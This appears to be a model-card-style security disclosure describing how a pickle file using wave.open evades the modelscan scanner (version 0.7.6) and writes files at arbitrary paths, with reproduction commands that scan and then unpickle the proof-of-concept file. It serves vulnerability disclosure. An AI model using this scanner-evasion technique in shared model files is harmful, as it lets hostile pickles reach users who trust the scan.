| license: mit | |
| tags: | |
| - security-research | |
| - modelscan-bypass | |
| - pickle-safety | |
| # modelscan-bypass-wave | |
| ## Modelscan Bypass PoC — wave.open | |
| **Severity**: MEDIUM | |
| **Impact**: Arbitrary file write — wave.open(path, "wb") creates/overwrites files on disk | |
| **modelscan version**: 0.7.6 (latest on PyPI) | |
| **Result**: "No issues found!" ✅ (false negative) | |
| ### Chain | |
| `wave.open("/target/path", "wb")` → creates file at arbitrary path | |
| ### Why It Works | |
| `wave.open` is NOT in modelscan's `unsafe_globals` blocklist. | |
| `wave` is NOT in the blocklist. | |
| ### Reproduction | |
| ```bash | |
| pip install modelscan | |
| modelscan scan -p bypass_poc.pkl | |
| # Output: "No issues found!" | |
| python3 -c "import pickle; pickle.loads(open('bypass_poc.pkl','rb').read())" | |
| # Executes arbitrary code | |
| ``` | |
| ### Responsible Disclosure | |
| This PoC is part of a responsible disclosure to ProtectAI via Huntr MFV program. | |